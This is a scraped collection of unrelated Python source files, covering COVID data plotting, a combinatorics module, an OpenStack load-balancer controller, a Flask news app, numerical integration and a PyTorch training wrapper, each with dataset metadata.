sns.barplot(x=x_attribute, y=y_attribute)\n graph.set(xlabel=x_label, ylabel=y_label)\n plt.savefig('../plots/' + title + '.png')\n\ndef plot_countplot(df, title, x_label, y_label, x_attribute, hue=None, hue_order=None, class_order=None, width=19, height=10):\n plt.subplots(figsize=(width, height))\n plt.title(title)\n graph = ''\n if hue != None:\n graph = sns.countplot(data=df, x=x_attribute, hue=hue, hue_order = hue_order, order=class_order)\n else:\n graph = sns.countplot(data=df, x=x_attribute)\n graph.set(xlabel=x_label, ylabel=y_label)\n plt.savefig('../plots/' + title + '.png')\n\ndef plot_scatterplot(df, title, x_label, y_label, column_x, column_y, ):\n plt.subplots(figsize=(19, 10))\n plt.title(title)\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n plt.scatter(x=df[column_x], y=df[column_y])\n plt.savefig('../plots/' + title + '.png')\n\n# Helper functions\n# get data frame by name, [train, test, location]\ndef get_data_frame(name='train'):\n if name == 'train':\n return pd.read_csv('../data/cases_train.csv')\n elif name == 'location':\n return pd.read_csv('../data/location.csv')\n\n# prints missing values and returns list of columns and columns's missing value\ndef print_num_of_missing_vals(df):\n col_names = []\n col_na = []\n num_of_rows = len(df.index)\n for column in df.columns:\n col_names.append(column)\n col_na.append((len(df[df[column].isnull()])/num_of_rows)*100)\n print(column, \" \", len(df[df[column].isnull()]))\n return col_names, col_na\n\n# 1.1 Data Analysis cases_train.csv \ndef perform_data_analysis_train():\n df = get_data_frame()\n print(\"---- Dataset -> cases_train.csv --------------------\")\n col_names, col_na = print_num_of_missing_vals(df)\n\n plot_bargraph('Missing Values (cases_train)', 'Attributes', 'Total percentage of values missing', col_names, col_na)\n \n # plot countries v/s outcome for top 5 countries\n top_5_countries = df['country'].value_counts().nlargest(5).index\n country_df = df[df['country'].isin(top_5_countries)]\n\n plot_countplot(country_df, 'Top 5 Countries_vs_Outcome', 'Countries', 'Outcome', x_attribute='country', hue='outcome')\n plot_countplot(country_df, 'Top 5 Countries Frequency wise', 'Countries', 'Frequency', x_attribute='country')\n\n # Plot Sex\n plot_countplot(country_df, 'Sex vs Outcome (cases_train)', 'Sex', 'Outcome', x_attribute='sex', hue='outcome')\n\n # combination of longitude and latitude\n plot_scatterplot(df=df, title='Longitude and Latitude (cases_train)', x_label='Longitude', y_label='Latitude', column_x='longitude', column_y='latitude')\n\n # Top 5 countries's top 3 provinces\n top_provs = []\n for c in top_5_countries:\n temp_df = country_df[country_df['country'] == c]\n top_states = temp_df['province'].value_counts().nlargest(5).index\n top_provs.extend(top_states)\n top_provs_df = country_df[country_df['province'].isin(top_provs)]\n plot_countplot(top_provs_df,title='Top 3 Provinces in Top 5 countries (cases_train)', x_label='Country and Provinces', y_label='Count', x_attribute='country', hue='province', hue_order=top_provs, class_order= top_5_countries)\n\n # plot age frequency\n isDigit_age_df = df[df['age'].notna()]\n isDigit_age_df = isDigit_age_df.loc[isDigit_age_df['age'].str.isdigit()]\n isDigit_age_df = isDigit_age_df.sort_values(by='age')\n plot_countplot(df=isDigit_age_df, title='Age Frequency (cases_train)', x_label='Age', y_label='Frequency', x_attribute='age', width=25, class_order=isDigit_age_df['age'])\n\n # plot month frequency\n df['date_confirmation'] = pd.to_datetime(df['date_confirmation'], errors='coerce')\n df = df[df['date_confirmation'].notna()]\n df_f = df.loc[df['date_confirmation'].dt.year.between(2020, 2020)]\n month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'dec']\n month_counts = []\n for month in range(1, 13):\n count = len(df.loc[df['date_confirmation'].dt.month.between(month, month)])\n month_counts.append(count)\n plot_bargraph(title='Month Frequency (cases_train)', x_label='Month', y_label='Frequency', x_attribute=month_names, y_attribute=month_counts)\n\n# 1.1 Data Analysis location.csv\ndef perform_data_analysis_location():\n df = get_data_frame('location')\n print(\"---- Dataset -> location.csv --------------------\")\n col_names, col_na = print_num_of_missing_vals(df)\n \n # Attribute missing values\n plot_bargraph('Missing Values (location)', 'Attributes', 'Total percentage of values missing', col_names, col_na)\n\n # combination of longitude and latitude\n plot_scatterplot(df=df, title='Longitude and Latitude (location)', x_label='Longitude', y_label='Latitude', column_x='Long_', column_y='Lat')\n\n # Top 10 countries with max confirmed cases\n top_10_countries_confirmed = df.groupby(['Country_Region'])['Confirmed'].sum().sort_values(ascending=False).nlargest(10)\n plot_bargraph(title='Top 10 Confirmed cases countries (location)', x_label='Country', y_label='# of Confirmed cases', x_attribute=top_10_countries_confirmed.index, y_attribute=top_10_countries_confirmed.values)\n # Top 10 countries with max Deaths\n top_10_countries_confirmed = df.groupby(['Country_Region'])['Deaths'].sum().sort_values(ascending=False).nlargest(10)\n plot_bargraph(title='Top 10 Deaths cases countries (location)', x_label='Country', y_label='# of Deaths', x_attribute=top_10_countries_confirmed.index, y_attribute=top_10_countries_confirmed.values)\n # Top 10 countries with max Recovered cases\n top_10_countries_confirmed = df.groupby(['Country_Region'])['Recovered'].sum().sort_values(ascending=False).nlargest(10)\n plot_bargraph(title='Top 10 Recovered cases countries (location)', x_label='Country', y_label='# of Recovered cases', x_attribute=top_10_countries_confirmed.index, y_attribute=top_10_countries_confirmed.values)\n # Top 10 countries with max Active cases\n top_10_countries_confirmed = df.groupby(['Country_Region'])['Active'].sum().sort_values(ascending=False).nlargest(10)\n plot_bargraph(title='Top 10 Active cases countries (location)', x_label='Country', y_label='# of Active cases', x_attribute=top_10_countries_confirmed.index, y_attribute=top_10_countries_confirmed.values)\n\n # Top 10 frequent countries\n top_10_countries = df['Country_Region'].value_counts().nlargest(10)\n plot_bargraph(title='Top 10 Most Frequent countries (location)', x_label='Countries', y_label='Frequency', x_attribute=top_10_countries.index, y_attribute=top_10_countries.values)\n\n # Top 10 frequent countries top 3 frequent provinces\n top_countries_df = df[df['Country_Region'].isin(top_10_countries.index)]\n top_provs = []\n for c in top_10_countries.index:\n temp = top_countries_df[top_countries_df['Country_Region'] == c]\n provs = temp['Province_State'].value_counts().nlargest(3).index\n top_provs.extend(provs)\n top_provs_df = df[df[\"Province_State\"].isin(top_provs)]\n plot_countplot(df=top_provs_df, title='Top Countries\"s Top 3 provinces (location)', x_label='Countries', y_label='Frequency', x_attribute='Country_Region', hue='Province_State', hue_order=top_provs, class_order=top_10_countries.index)\n\n # top incidence rate regions\n top_incidence = df.sort_values(by='Incidence_Rate', ascending=False).head(5)\n plot_bargraph(title='Top 5 Incidence Rate regions (location)', x_label='Region', y_label='Incidence rate', x_attribute=top_incidence['Combined_Key'], y_attribute=[float(i) for i in top_incidence['Incidence_Rate']])\n\n # top case fatility rate regions\n top_incidence = df.sort_values(by='Case-Fatality_Ratio', ascending=False).head(5)\n plot_bargraph(title='Top 5 Case Fatility Rate regions (location)', x_label='Region', y_label='Case Fatality Ratio rate', x_attribute=top_incidence['Combined_Key'], y_attribute=[float(i) for i in top_incidence['Case-Fatality_Ratio']])\n\n\n# 1.3 - Plot box plots and get outliers using IQR\ndef outlier_detection_elimination():\n print('-------- Performing Outlier Detection and Elimination------')\n df = get_data_frame()\n\n print(\"-------- For 'Age' --------\")\n isDigit_age_df = df[df['age'].notna()]\n isDigit_age_df = isDigit_age_df.loc[isDigit_age_df['age'].str.isdigit()]\n isDigit_age_df['age'] = isDigit_age_df['age'].astype(float)\n sns.boxplot(x=isDigit_age_df['age'])\n plt.savefig('../plots/outliers/' + 'Cases Train- ' + 'Age' + '.png')\n # TODO: Decide the quantile \n q1, q3 = np.percentile(isDigit_age_df['age'], [25, 75])\n print('Quantile1 and Quantile3 -> ', q1, q3)\n iqr = q3-q1\n print('IQR -> ', iqr)\n lower_bound = q1 - (1.5*iqr)\n upper_bound = q3 + (1.5*iqr)\n print('Lower and Upper bound -> ', lower_bound, upper_bound)\n # No values in dataset that are less than 0\n isDigit_age_df = isDigit_age_df.loc[(isDigit_age_df['age'] < 0.0) | (isDigit_age_df['age'] > upper_bound)]\n isDigit_age_df.to_csv('../data/outliers/Age.csv')\n print('------ Outliers saved to ----> ./code/data/outliers/')\n\n numeric_cols = ['latitude', 'longitude']\n for column in numeric_cols:\n print(\"-------- For \" + column + \"--------\")\n temp_df = df[df[column].notna()]\n sns.boxplot(x=temp_df[column])\n plt.savefig('../plots/outliers/' + 'Cases Train- ' + column + '.png')\n q1, q3 = np.percentile(temp_df[column], [25, 75])\n print('Quantile1 and Quantile3 -> ', q1, q3)\n iqr = q3 - q1\n print('IQR -> ', iqr)\n lower_bound = q1 - (1.5*iqr)\n upper_bound = q3 + (1.5*iqr)\n print('Lower and Upper bound -> ', lower_bound, upper_bound)\n temp_df = temp_df.loc[(temp_df[column] < 0.0) | (temp_df[column] > upper_bound)]\n temp_df.to_csv('../data/outliers/'+column+'.csv')\n print('------ Outliers saved to ----> ./code/data/outliers/')\n \n\nif __name__ == '__main__':\n\n perform_data_analysis_train()\n perform_data_analysis_location()\n\n outlier_detection_elimination()\n\n","sub_path":"code/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"168293339","text":"'''Module to calculate combinations of elements\n\nThis module contains a function to calculate all subsets of a given length of\na set of n elements.\n\nE.g. All subsets of length 2 from a set of 5 elements.\n\nThere exist 10 subsets:\n \n >>> ncombinations(5, 2)\n 10\n\nAnd the subsets are:\n \n >>> list(combinations(5, 2))\n [[0, 1], [0, 2], [0, 3], [0, 4], [1, 2], [1, 3], [1, 4], [2, 3], [2, 4], [3, 4]]\n \n\nsubsets() is a convenience function that yields the actual subsets from a list.\n\nBased on: Kenneth H. Rosen, Discrete Mathematics and Its Applications, 2nd edition (NY: McGraw-Hill, 1991), pp. 284-286\n\nBut also interesting:\nhttp://code.activestate.com/recipes/190465-generator-for-permutations-combinations-selections\n\n# License: GNU General Public License, see http://www.clips.ua.ac.be/~vincent/scripts/LICENSE.txt\n'''\n__date__ = 'July 2013'\n__author__ = 'Vincent Van Asch'\n__version__ = '1.2.0'\n\n\n### Helper functions #################################################\ndef fact(number, bound=1):\n '''Return the faculty: number*(number-1)*(number-2)*...*bound'''\n if number < bound:\n raise ValueError('number should be equal or greater than bound')\n \n if number == bound:\n return bound\n else:\n return number*fact(number-1, bound)\n \ndef _next(a, numLeft, n, r, total):\n '''Calculate next step'''\n if numLeft == total:\n return a, numLeft-1\n else:\n i=r-1\n while a[i] == n-r+i:\n i=i-1\n\n a[i] = a[i] + 1\n for j in xrange(i+1, r):\n a[j] = a[i] + j - i\n\n return a, numLeft-1\n \n### Main function ####################################################\n\ndef ncombinations(n, r):\n \"\"\"\n Returns the total number of unique subsets of length r\n you can take from n elements. \n \n n is the number of elements.\n r is the length of the subsets.\n \"\"\"\n # Check\n if n < 0: raise ValueError('n should be positive.')\n if r < 0: raise ValueError('r should be positive.')\n if r == 0: return 1\n \n # total = fact(n, 1)/(fact(r, 1)*fact(n-r, 1)) # Don't use this because calculating fact() of high numbers gives a RuntimeError\n return fact(n, n-r+1)/fact(r, 1)\n\ndef combinations(n, r):\n \"\"\"\n Yields all unique subsets of length r that you\n can take from n elements. \n \n n is the number of elements.\n r is the length of the subsets.\n \"\"\"\n # Check\n if n < 0: raise ValueError('n should be positive.')\n if r < 0: raise ValueError('r should be positive.')\n if r == 0: \n yield ()\n raise StopIteration\n if r > n: raise StopIteration\n if n < 1: raise StopIteration\n \n if r == n:\n yield range(0, n)\n raise StopIteration\n \n # Initialize\n getallen = xrange(0,n)\n a = range(r)\n \n # The total number of possible combinations\n total = ncombinations(n, r)\n\n # Produce all pairs\n numLeft = total\n while numLeft > 0:\n comb=[] \n a, numLeft = _next(a, numLeft, n, r, total)\n for i in a:\n comb.append(getallen[i])\n \n yield comb\n \n \n \ndef subsets(l, r):\n '''Takes a list with elements and yields all\n unique subsets of length r.\n \n l: a list\n r: an integer (length of the subset)\n '''\n for c in combinations(len(l), r):\n yield tuple([l[x] for x in c])\n\n\n\ndef subcombinations(*sizes):\n '''Yields all element combinations.\n \n For example:\n >>> subcombinatins(3,2)\n [[0, 0], [0, 1], [1, 0], [1, 1], [2, 0], [2, 1]]\n \n Thus, each element of range(3) is combined with each element of\n range(2). Yielding 2*3 element combinations.\n The number of arguments is free.\n '''\n total = reduce(lambda x,y:x*y, sizes)\n \n limit=10000000\n if total > limit: raise ValueError('The number of combinations would exceed the limit %d' %limit)\n \n data=[[]]\n for size in sizes:\n cache=[]\n for part in data:\n for i in range(size):\n cache.append(part + [i])\n data = cache[:]\n \n assert len(data) == total\n return data\n","sub_path":"code/ruzicka/combinations.py","file_name":"combinations.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"6720691","text":"# Copyright 2013 Hewlett-Packard Development Company, L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom libra.mgm.controllers.build import BuildController\nfrom libra.mgm.controllers.delete import DeleteController\nfrom libra.mgm.controllers.vip import BuildIpController, AssignIpController\nfrom libra.mgm.controllers.vip import RemoveIpController, DeleteIpController\nfrom libra.openstack.common import log\n\n\nLOG = log.getLogger(__name__)\n\n\nclass PoolMgmController(object):\n\n ACTION_FIELD = 'action'\n RESPONSE_FIELD = 'response'\n RESPONSE_SUCCESS = 'PASS'\n RESPONSE_FAILURE = 'FAIL'\n\n def __init__(self, json_msg):\n self.msg = json_msg\n\n def run(self):\n if self.ACTION_FIELD not in self.msg:\n LOG.error(\"Missing `{0}` value\".format(self.ACTION_FIELD))\n self.msg[self.RESPONSE_FILED] = self.RESPONSE_FAILURE\n return self.msg\n\n action = self.msg[self.ACTION_FIELD].upper()\n\n try:\n if action == 'BUILD_DEVICE':\n controller = BuildController(self.msg)\n elif action == 'DELETE_DEVICE':\n controller = DeleteController(self.msg)\n elif action == 'BUILD_IP':\n controller = BuildIpController(self.msg)\n elif action == 'ASSIGN_IP':\n controller = AssignIpController(self.msg)\n elif action == 'REMOVE_IP':\n controller = RemoveIpController(self.msg)\n elif action == 'DELETE_IP':\n controller = DeleteIpController(self.msg)\n else:\n LOG.error(\n \"Invalid `{0}` value: {1}\".format(\n self.ACTION_FIELD, action\n )\n )\n self.msg[self.RESPONSE_FIELD] = self.RESPONSE_FAILURE\n return self.msg\n self.msg = controller.run()\n # Delete a built device if it has failed\n if (\n action == 'BUILD_DEVICE'\n and self.msg[self.RESPONSE_FIELD] == self.RESPONSE_FAILURE\n and 'name' in self.msg\n ):\n delete_msg = {'name': self.msg['name']}\n controller = DeleteController(delete_msg)\n controller.run()\n\n return self.msg\n except Exception:\n LOG.exception(\"Controller exception\")\n self.msg[self.RESPONSE_FIELD] = self.RESPONSE_FAILURE\n return self.msg\n","sub_path":"libra/mgm/controllers/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"262812162","text":"from flask import render_template, request, redirect, url_for\nfrom . import main\nfrom ..requests import get_topnews, get_categories, get_newsupdates\n\n #Views\n@main.route('/') \ndef index():\n '''\n View root page function that returns the index page and its data\n '''\n #Getting top news and categorically arranged news\n top_articles = get_topnews('google-news')\n print(top_articles)\n biz_articles = get_categories('business')\n tech_articles = get_categories('technology')\n ent_articles = get_categories('entertainment')\n sprt_articles = get_categories('sports')\n title = '4REAL NEWS'\n return render_template('index.html', title = title, google_news = top_articles, biz = biz_articles, tech = tech_articles, ent = ent_articles, sprt = sprt_articles)\n\n\n@main.route('/update/')\ndef article(id):\n detz_articles = get_newsupdates(id)\n# print(detz_articles)\n return render_template('news.html',detz = detz_articles)","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"428312223","text":"\ndef transmitter(a, k):\n if len(a) == 0:\n return 0\n if len(a) == 1:\n return 1\n count = 0\n m = 0\n l = 0\n r = 0\n while m < len(a):\n if m == len(a) - 1:\n return count + 1\n while m < len(a) - 1 and a[m+1] - k <= a[l]:\n m+=1\n while r < len(a) - 1 and a[m] + k >= a[r+1]:\n r+=1\n m = r + 1\n l = m\n r = m\n count+=1\n return count\n\na = [7,2,4,6,5,9,12,11]\n# a = [1,2,3,4,5]\na.sort()\nn = 2\n\nprint(transmitter(a, n))\n","sub_path":"geeks4geeks/search/radio-transmitter.py","file_name":"radio-transmitter.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"650901935","text":"import unittest\nfrom mock import MagicMock, call, ANY\n\nfrom scanpointgenerator import LineGenerator, CompoundGenerator\n\nfrom malcolm.modules.demo.parts import ScanTickerPart\nfrom malcolm.core import call_with_params, Context\n\n\nclass AlmostFloat:\n def __init__(self, val, delta):\n self.val = val\n self.delta = delta\n\n def __eq__(self, other):\n return abs(self.val - other) <= self.delta\n\n\nclass TestScanTickerPart(unittest.TestCase):\n\n def setUp(self):\n self.context = MagicMock(spec=Context)\n self.o = call_with_params(ScanTickerPart, name=\"AxisTwo\", mri=\"mri\")\n\n def prepare_half_run(self):\n line1 = LineGenerator('AxisOne', 'mm', 0, 2, 3)\n line2 = LineGenerator('AxisTwo', 'mm', 0, 2, 2)\n compound = CompoundGenerator([line1, line2], [], [], 1.0)\n compound.prepare()\n call_with_params(self.o.configure, ANY, 0, 2, MagicMock(),\n generator=compound, axesToMove=['AxisTwo'])\n\n def test_configure(self):\n self.prepare_half_run()\n assert self.o.completed_steps == 0\n assert self.o.steps_to_do == 2\n\n def test_run(self):\n self.prepare_half_run()\n update_completed_steps = MagicMock()\n self.o.run(self.context, update_completed_steps)\n assert self.context.mock_calls == [\n call.block_view(\"mri\"),\n call.block_view().counter.put_value(0),\n call.sleep(AlmostFloat(1.0, delta=0.05)),\n call.block_view().counter.put_value(2),\n call.sleep(AlmostFloat(2.0, delta=0.1))]\n","sub_path":"tests/test_modules/test_demo/test_scantickerpart.py","file_name":"test_scantickerpart.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"102791202","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 15 17:34:55 2020\n\n@author: akswa\n\"\"\"\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\n\ndef trapezoidal_rule(f,a,b,n, vect = True):\n \"\"\"\n This function implements the trapezoidal rule for integral approximation\n\n Parameters\n ----------\n f : TYPE: Function\n DESCRIPTION: Function to integrate\n a : TYPE: Float\n DESCRIPTION: Lower bound on integral\n b : TYPE: Float\n DESCRIPTION: Upper bound on integral\n n : TYPE: Integer\n DESCRIPTION: Number of gridpoints\n\n Returns\n -------\n None.\n\n \"\"\"\n \n h = (b-a)/(n)\n x = np.linspace(a,b,n+1)\n \n #Trapezoidal Rule Vectorized\n if vect:\n I_vect = h*f(x)\n I_vect[0] = I_vect[0]/2\n I_vect[-1] = I_vect[-1]/2\n I = sum(I_vect)\n \n # Nonvectorized Trapezoidal Rule\n else:\n I = (1/2)*h*(f(x[0]) + f(x[-1]))\n for i in range(1,n):\n I += h*f(x[i])\n \n \n return I,h\n\ndef debye_trap_approx():\n k = 1.38064852 * 10**-23 # Boltzman's Constant\n N = 6.022 * 10**23\n thetaD = 309 # Debye temperature\n T_i = 1 # We cut off T = 0 since integral in indefinite for T = 0\n T_f = 1083\n f = lambda x: (x**4) * np.exp(x) / (np.exp(x)-1)**2 # Define Function for integration\n eps = sys.float_info.epsilon # System epsilon\n \n T_range = np.linspace(T_i,T_f,1000)\n C_range = []\n # Evaluate Integral from T_i to T_k\n for T in T_range:\n # We use eps instead of 0 for lower bound since f is undef for 0\n C = 9*k*N*T**3/thetaD**3 * trapezoidal_rule(f,eps,thetaD/T,5000)[0] \n C_range.append(C)\n \n # Plotting\n plt.plot(T_range,C_range)\n plt.xscale(\"log\")\n \n \n return\n\n\n\nif __name__ == '__main__':\n #f = lambda x: x**2\n #a = 0\n #b = 3\n #n = 50\n #I,h = trapezoidal_rule(f, a, b, n)\n #print(I,h**2)\n \n debye_trap_approx()\n ","sub_path":"hw1/old/exC.py","file_name":"exC.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"458355055","text":"# encoding: utf-8\n\n\"\"\"A basic AMF Dialect class.\"\"\"\n\nimport web\n\nfrom functools import wraps\nfrom web.rpc import route\n\ntry:\n import pyamf.remoting.gateway\nexcept ImportError: # pragma: no cover\n raise ImportError(\"If you want to use the AMFController class, you must install PyAMF.\")\n\n\n__all__ = ['AMFController']\nlog = __import__('logging').getLogger(__name__)\n\n\nclass AMFController(web.core.Dialect):\n __gateway__ = dict()\n\n def __init__(self):\n self._gateway = pyamf.remoting.gateway.BaseGateway(logger=log, *self.__gateway__)\n\n def _call(self, fn, parent):\n @wraps(fn)\n def inner(*args, **kw):\n callback = getattr(parent, '__before__', None)\n if callback:\n args = parent.__before__(*args)\n\n result = fn(*args, **kw)\n\n callback = getattr(parent, '__after__', None)\n if callback:\n result = parent.__after__(result, *args)\n\n return result\n\n return inner\n\n def __call__(self, request):\n pyamf_request = pyamf.remoting.decode(request.body)\n pyamf_response = pyamf.remoting.Envelope(pyamf_request.amfVersion)\n\n for name, message in pyamf_request:\n # Dynamically build mapping.\n # This introduces a performance hit on the first request of each method.\n if message.target not in self._gateway.services:\n fn, parent = route(self, message.target, AMFController)\n self._gateway.addService(self._call(fn, parent), message.target)\n\n pyamf_response[name] = self._gateway.getProcessor(message)(message)\n\n web.core.response.headers['Content-Type'] = pyamf.remoting.CONTENT_TYPE\n\n return pyamf.remoting.encode(pyamf_response).getvalue()\n","sub_path":"web/rpc/amf.py","file_name":"amf.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"347172473","text":"class Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n \"\"\"\n index1=0\n index2=1\n while index1<=len(nums)-2:\n k=nums[index1]\n index2=index1+1\n while index2<=len(nums)-1:\n if k+nums[index2]==target:\n return index1+1, index2+1\n else:\n index2+=1\n index1+=1\n \"\"\"\n dic={}\n for i,j in enumerate(nums):\n i=dic[j]\n for k in dic:\n re=target-dic[k]\n if re in dic.value():\n return k,dic[re]\n return 0\n","sub_path":"script/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"123911788","text":"naam = 'Mark Rutte'\nplaats = 'Den Haag'\nprint('Mijn naam is ' + naam + ' en ik woon in ' + plaats)\nprint('Mijn naam is {} en ik woon in {} '.format(naam, plaats))\nleeftijd1 = 17\nleeftijd2 = 18\nsom = (leeftijd1 + leeftijd2)\nprint('De som van de leeftijden is {}'.format(som))\n\nweekdag = 'dinsdag'\ndag = 25\nmaand = 'maart'\nuur = 14\nminuten = 15\nprint('{} {} {} '.format(weekdag, dag, maand))\nprint('{} {} {} om {}.{} uur'.format(weekdag, dag, maand, uur, minuten))","sub_path":"les05/oefening5_3.py","file_name":"oefening5_3.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"322836762","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 4 09:23:59 2016\r\n\r\n@author: smcint\r\n\"\"\"\r\n\r\nfor i in [1]:#range(sf.Nsol-1):\r\n L2D,L3D,r,z = sf.connection('core2',i)\r\n \r\n pl.plot(r,z)\r\n pl.plot(r[0],z[0],'o')\r\n pl.plot(r[30],z[30],'o')\r\n \r\npl.axis('equal')\r\n\r\n","sub_path":"etna/core_connection.py","file_name":"core_connection.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"369109196","text":"# -*- coding: utf-8 -*-\n\"\"\" \nClass used to wrap a neural network class used for a classification task. \nImplements utility functions to train, test, predict, cross_validate, etc... \nthe neural network. \"\"\"\n\nimport torch\nfrom torch import nn\nfrom torch import optim\nfrom sklearn.model_selection import KFold\n\nimport os\n\nfrom copy import deepcopy\n\nfrom callbacks import *\n\nclass History():\n def __init__(self):\n self.num_epochs = 0\n self.train_losses = []\n self.test_losses = []\n \n def new_epoch(self, train_loss, test_loss=None):\n self.num_epochs += 1\n self.train_losses.append(train_loss)\n self.test_losses.append(test_loss)\n \nclass modelWrapper(nn.Module):\n \"\"\" \n Wrap a neural network class. \n \n The subclass should specify the following parameters (to be initialized in the __init__):\n - self.features: \n of class torch.nn.Model (e.g. torch.nn.Sequential(...)) used to preprocess\n the data.\n - self.num_features:\n an integer indicating how many features will be extracted by self.features\n and used to reshape the data before feeding it to the self.classifier.\n - self.classifier:\n after reshaping the data into (#samples, self.num_features) it is fed to \n self.classifier (of class torch.nn.Model) which should contain fully connected \n layers and provide the final output of the forward pass.\n - self.criterion: \n cost function used (e.g. torch.nn.CrossEntropyLoss())\n #- self.optimizer: \n # optimizer that will update the parameters based on \n # the computed gradients (e.g. torch.optim.Adam(self.parameters()))\n \"\"\"\n \n def __init__(self, \n nb_hidden=50, \n activation=nn.ReLU, \n optimizer=optim.Adam, \n weight_decay=0, \n dropout=0.1, \n nb_layers=1 # number of additional layers\n ):\n super(modelWrapper, self).__init__()\n self.history = History()\n self.dir_path = \"storage/\" + self.__class__.__name__\n \n self.setting = {\n \"nb_hidden\": nb_hidden,\n \"activation\": activation,\n \"optimizer\": optimizer,\n \"weight_decay\": weight_decay,\n \"dropout\": dropout,\n \"nb_layers\": nb_layers\n }\n \n def fit(self, X_train, y_train, \n X_test=None, y_test=None, \n batch_size=20, \n epochs=25, \n verbose=True,\n callbacks=[],\n shuffle=True\n ):\n \"\"\" Fit the model on the training data.\n Input:\n - X_train: Variable containing the input of the train data.\n shape=(#train_samples, #dimensions)\n - y_train: Variable containing the target of the train data. \n shape=(#train_samples) or, if the criterion chosen \n expects one-hot encoding, shape=(#train_samples, #classes).\n - X_test: Variable containing the input of the test data. \n shape=(#test_samples, #dimensions)\n - y_test: Variable containing the the target of the test data.\n shape=(#train_samples) or, if the criterion chosen \n expects one-hot encoding, shape=(#train_samples, #classes).\n If X_test and y_test are given then then also the test \n error is computed and printed at each epoch.\n - batch_size: Integer representing the number of samples per \n gradient update.\n - epochs: Integer representing the number of epochs (#iterations \n over the entire X_train and y_train data provided) to train \n the model.\n - verbose: boolean indicating whether or not print a log to the standard\n output.\n - callbacks: list classes that will be called during training \n at each epoch and at the end of the training.\n - shuffle: if True. The train set is shuffled at each epoch.\n \"\"\"\n # ----- initialize the callbacks\n callbacks = [c(self) for c in callbacks]\n \n compute_test_err = X_test is not None and y_test is not None\n \n lowest_loss = float('inf')\n best_model = self.state_dict()\n # use \"try\" so that if the training stops or gets interrupted I still save the best model \n # and the intermediary predictions\n try:\n for e in range(1, epochs+1):\n if shuffle:\n indices_perm = torch.randperm(X_train.shape[0])\n X_train = X_train[indices_perm]\n y_train = y_train[indices_perm]\n \n sum_loss_train = 0\n num_batches = 0\n for b in range(0, X_train.size(0), batch_size): \n num_batches += 1\n output = self(X_train[b : b+batch_size])\n loss = self.criterion(output, y_train[b : b+batch_size])\n\n if torch.__version__ == '0.4.0':\n sum_loss_train += loss.data[0].item()\n else:\n sum_loss_train += loss.data[0]\n self.zero_grad()\n loss.backward()\n self.optimizer.step()\n \n sum_loss_train = sum_loss_train/num_batches\n \n test_loss = None\n if compute_test_err:\n test_loss = self.criterion(self(X_test), y_test).data\n test_loss = test_loss.item() if torch.__version__ == '0.4.0' else test_loss[0]\n self.history.new_epoch(sum_loss_train, test_loss)\n\n if verbose:\n print(\n \"Epoch \" + str(e) + \"/\" + str(epochs) + \": \" +\n \"Train loss:\", str(sum_loss_train) + \". \" + \n 'Train accuracy {:0.2f}%'.format(self.score(X_train, y_train)*100) + \". \" +\n ('Test accuracy {:0.2f}%'.format(self.score(X_test, y_test)*100) if compute_test_err else \"\"))\n \n # ----- call the callbacks classes (update their internal state)\n for callback in callbacks:\n callback()\n finally:\n # ----- finalize the callbacks classes (which may store to file their state) \n for callback in callbacks:\n callback.end()\n \n return self\n \n def compute_nb_errors(self, X, y):\n \"\"\" Compute the number of misclassified samples. \"\"\"\n self.eval()\n \n predicted_classes = self.predict(X)\n true_classes = y.data.max(1)[1] if y.dim() == 2 else y.data # if one-hot encoding then extract the class\n \n nb_errors = (true_classes != predicted_classes).sum()\n\n self.train()\n return nb_errors\n\n def predict(self, X):\n \"\"\" Predict the label of the samples in X. \"\"\"\n self.eval()\n \n predictions = self(X).data.max(1)[1]\n \n self.train()\n return predictions\n \n def score(self, X, y):\n \"\"\" Compute the accuracy. \"\"\"\n self.eval()\n \n true_classes = y.data.max(1)[1] if y.dim() == 2 else y.data # if one-hot encoding then extract the class\n pred_clases = self.predict(X)\n \n score = (pred_clases==true_classes).sum()\n \n if torch.__version__ == '0.4.0':\n score = score.item()\n \n score = score/X.shape[0]\n \n self.train()\n return score\n \n def forward(self, x):\n 